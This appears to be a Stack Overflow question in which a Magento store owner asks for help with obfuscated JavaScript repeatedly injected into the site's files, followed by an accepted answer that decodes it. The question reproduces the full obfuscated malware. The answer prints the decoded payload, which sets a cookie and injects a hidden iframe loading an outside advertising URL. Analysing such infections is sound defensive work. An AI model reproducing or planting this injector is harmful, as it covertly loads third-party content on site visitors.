# Javascript Malware

Tags: javascript, magento, malware

i have some strange problem on my magento's javascript files for 5 days. there is some bunch of code like:

```js
/*e37931de3b5feaa824f544bdb33a8df2*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x7a\x7a\x7a\x61\x69"]=["\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x66\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x61\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33","\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x63\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x63\x33\x31","\x37\x33\x37\x34\x36\x35\x37\x32\x37\x36\x36\x31\x37\x30\x36\x66\x36\x39\x36\x64\x36\x35\x36\x65\x36\x39\x36\x31\x36\x63\x36\x35\x36\x65\x36\x31\x32\x65\x36\x39\x36\x65\x36\x36\x36\x66\x32\x66\x36\x64\x36\x35\x36\x37\x36\x31\x36\x31\x36\x34\x37\x36\x36\x35\x37\x32\x37\x34\x36\x39\x37\x61\x36\x35\x32\x66\x33\x66\x36\x62\x36\x35\x37\x39\x37\x37\x36\x66\x37\x32\x36\x34\x33\x64\x36\x31\x33\x37\x36\x34\x36\x31\x33\x35\x36\x33\x33\x36\x33\x32\x33\x38\x36\x35\x33\x31\x33\x36\x33\x30\x33\x38\x33\x37\x36\x36\x36\x34\x36\x36\x36\x34\x33\x32\x33\x32\x33\x30","\x36\x31\x36\x35\x36\x32\x36\x31\x36\x31\x33\x34\x33\x34\x36\x32\x36\x35\x36\x31\x32\x32\x33\x62\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x65\x36\x39\x36\x65\x36\x65\x36\x35\x37\x32\x34\x38\x35\x34\x34\x64\x34\x63\x33\x64\x32\x32\x33\x63\x36\x34\x36\x39\x37\x36\x32\x30\x37\x33\x37\x34\x37\x39\x36\x63\x36\x35\x33\x64\x32\x37\x37\x30\x36\x66\x37\x33\x36\x39\x37\x34\x36\x39\x36\x66\x36\x65\x33\x61\x36\x31\x36\x32\x37\x33\x36\x66\x36\x63\x37\x35\x37\x34\x36\x35\x33\x62\x37\x61\x32\x64\x36\x39\x36\x65\x36\x34\x36\x35\x37\x38\x33\x61\x33\x31\x33\x30","\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x32\x31\x33\x64\x32\x30\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x39\x37\x62\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31","\x33\x30\x33\x30\x33\x62\x37\x34\x36\x66\x37\x30\x33\x61\x32\x64\x33\x31\x33\x30\x33\x30\x33\x30\x37\x30\x37\x38\x33\x62\x36\x63\x36\x35\x36\x36\x37\x34\x33\x61\x32\x64\x33\x39\x33\x39\x33\x39\x33\x39\x37\x30\x37\x38\x33\x62\x32\x37\x33\x65\x33\x63\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x32\x30\x37\x33\x37\x32\x36\x33\x33\x64\x32\x37\x32\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65","\x32\x38\x36\x33\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x34\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x33\x62\x36\x34\x32\x65\x37\x33\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x36\x34\x32\x65\x36\x37\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x32\x62\x36\x33\x32\x39\x33\x62\x37\x64\x36\x39\x36\x36\x32\x38\x36\x31\x32\x30\x32\x36\x32\x36\x32\x30\x36\x32\x32\x39\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65","\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x36\x31\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x32\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x35\x32\x36\x35\x36\x37\x34\x35\x37\x38\x37\x30\x32\x38\x36\x31\x32\x62\x32\x37\x33\x64\x32\x38\x35\x62\x35\x65\x33\x62\x35\x64\x32\x39\x37\x62\x33\x31\x32\x63\x37\x64\x32\x37\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30","\x65\x49\x6e\x74\x28\x74\x7a\x7a\x68\x69\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x64\x61\x64\x61\x61\x2c\x64\x61\x64\x61\x61\x2b\x32\x29\x2c\x20\x31\x36\x29\x2b\x22\x2c\x22\x3b\x7d\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x30\x2c\x68\x69\x6e\x62\x74\x2e\x6c\x65\x6e\x67\x74\x68\x2d\x31\x29\x3b\x65\x76\x61\x6c\x28\x65\x76\x61\x6c\x28\x27\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x27\x2b\x68\x69\x6e\x62\x74\x2b\x27\x29\x27\x29\x29\x3b\x7d\x29\x28\x29\x3b","\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x30\x33\x64\x32\x30\x36\x31\x32\x62\x32\x37\x33\x64\x32\x37\x32\x62\x36\x32\x32\x62\x32\x38\x36\x33\x32\x30\x33\x66\x32\x30\x32\x37\x33\x62\x32\x30\x36\x35\x37\x38\x37\x30\x36\x39\x37\x32\x36\x35\x37\x33\x33\x64\x32\x37\x32\x62\x36\x34\x32\x65\x37\x34\x36\x66\x35\x35\x35\x34\x34\x33\x35\x33\x37\x34\x37\x32\x36\x39\x36\x65\x36\x37\x32\x38\x32\x39\x32\x30\x33\x61\x32\x30\x32\x37\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30","\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x68\x69\x6e\x62\x74\x3d\x22\x22\x3b\x76\x61\x72\x20\x74\x7a\x7a\x68\x69\x3d\x22\x37\x37\x36\x39\x36\x65\x36\x34\x36\x66\x37\x37\x32\x65\x36\x66\x36\x65\x36\x63\x36\x66\x36\x31\x36\x34\x32\x30\x33\x64\x32\x30\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x38\x32\x39\x37\x62\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x36\x31\x32\x63\x36\x32\x32\x63\x36\x33\x32\x39\x37\x62\x36\x39\x36\x36","\x36\x32\x32\x65\x36\x35\x37\x38\x36\x35\x36\x33\x32\x38\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x36\x33\x32\x39\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30\x36\x33\x35\x62\x33\x30\x35\x64\x32\x65\x37\x33\x37\x30\x36\x63\x36\x39\x37\x34\x32\x38\x32\x37\x33\x64\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x32","\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\x36\x31\x37\x30\x37\x30\x36\x35\x36\x65\x36\x34\x34\x33\x36\x38\x36\x39\x36\x63\x36\x34\x32\x38\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x39\x33\x62\x37\x64\x37\x64\x22\x3b\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x64\x61\x64\x61\x61\x3d\x30\x3b\x64\x61\x64\x61\x61\x3c\x74\x7a\x7a\x68\x69\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x64\x61\x64\x61\x61\x2b\x3d\x32\x29\x7b\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2b\x70\x61\x72\x73","\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x37\x32\x36\x35\x36\x31\x37\x34\x36\x35\x34\x35\x36\x63\x36\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x38\x32\x32\x36\x34\x36\x39\x37\x36\x32\x32\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x30\x33\x64\x32\x30\x32\x32\x36\x38\x37\x34\x37\x34\x37\x30\x33\x61\x32\x66\x32\x66\x37\x36\x37\x32\x36\x66\x37\x34\x32\x65"];var bhtad=ftrsn=nkkkk=knzsd=rbikr=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"],nftkr=window;eval(eval("[nftkr[\"ftrsn\"][\"\x31\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x36\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x39\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x37\"],nftkr[\"nkkkk\"][\"\x31\x31\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x34\"],nftkr[\"rbikr\"][\"\x31\"],nftkr[\"nkkkk\"][\"\x31\x33\"],nftkr[\"knzsd\"][\"\x32\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x33\"],nftkr[\"knzsd\"][\"\x35\"],nftkr[\"bhtad\"][\"\x31\x32\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x38\"]].join(\"\");"));/*e37931de3b5feaa824f544bdb33a8df2*/
```

i check web server with rkhunter and clamav but nothing found, replace from backup archive works for 1 day and again this code will write itself from nowhere on my files, i found something in this blog: [Massive Admedia/Adverting iFrame Infection](https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html) which is exactly like mine except im using magento.

im exhausted over fixing this and need your help.
if you found something to cure this i will appreciate it.
Thanks.

Comment: Check the browser extensions you've installed. Also check on other browsers and neighbor's browsers.

Comment: Tushar thanks for reply, im using chrome with AdBlock, Adblock Plus, Advanced REST client and IDM Integration Module. my store is public so it could be any one with some sort of malware extension, right? so how to findout more?

Comment: Downvote for your inability?

Comment: Stackoverflow really isn't the best place for this; it seems like an issue with compromised hosting, and not a programming problem.

Answer (score 7, accepted):

### Techniq

`"\x64\x6f"` is decoded as `do`, just paste it into browser console, and it will show decoded string

so `window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"]` is `window["document"]["zzzai"]`

`eval()` is javascript code evaluation from string, so `eval("alert('text')")` will throw alert although function is in string.

All of that code is just hiding the simple thing, so that it looks like some internal browser things or plugins libs

### Summary

That script looks like this when decoded

```
window["293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e"]

var bhtad=ftrsn=nkkkk=knzsd=rbikr=window.document.zzzai;

(function(){
    var hinbt="";
    var tzzhi="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822316535313439633538313335323539396238366630346365353134396335383133353235393962383666303463313231373031363261222c226131363134663663653235306661623462396161313734633966383266623264222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e737465727661706f696d656e69616c656e612e696e666f2f6d656761616476657274697a652f3f6b6579776f72643d6137646135633632386531363038376664666432323061656261613434626561223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";
    for (var dadaa=0; dadaa < tzzhi.length; dadaa+=2) {
        hinbt = hinbt + parseInt(tzzhi.substring(dadaa, dadaa + 2), 16) + ",";
    }
    hinbt = hinbt.substring(0, hinbt.length - 1); 
    eval(eval('String.fromCharCode(' + hinbt + ')'));
})();
```

It's execution will inject iframe with adult content into page

```
window.onload = function(){
    function x22bq(a,b,c){
        if(c){
            var d = new Date();
            d.setDate(d.getDate() + c);
        }
        if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');
        else return false;
    }
    function x33bq(a){
        var b = new RegExp(a+'=([^;]){1,}');
        var c = b.exec(document.cookie);
        if(c) c = c[0].split('=');
        else return false;
        return c[1] ? c[1] : false;
    }
    var x33dq = x33bq("1e5149c581352599b86f04ce5149c581352599b86f04c12170162a","a1614f6ce250fab4b9aa174c9f82fb2d",1);
    var x22dq = document.createElement("div");
    var x22qq = "http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea";
    x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"+x22qq+"'></iframe></div>";
    document.body.appendChild(x22dq);
}
```

So it inserts advertisement from `http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea` url, that's all i know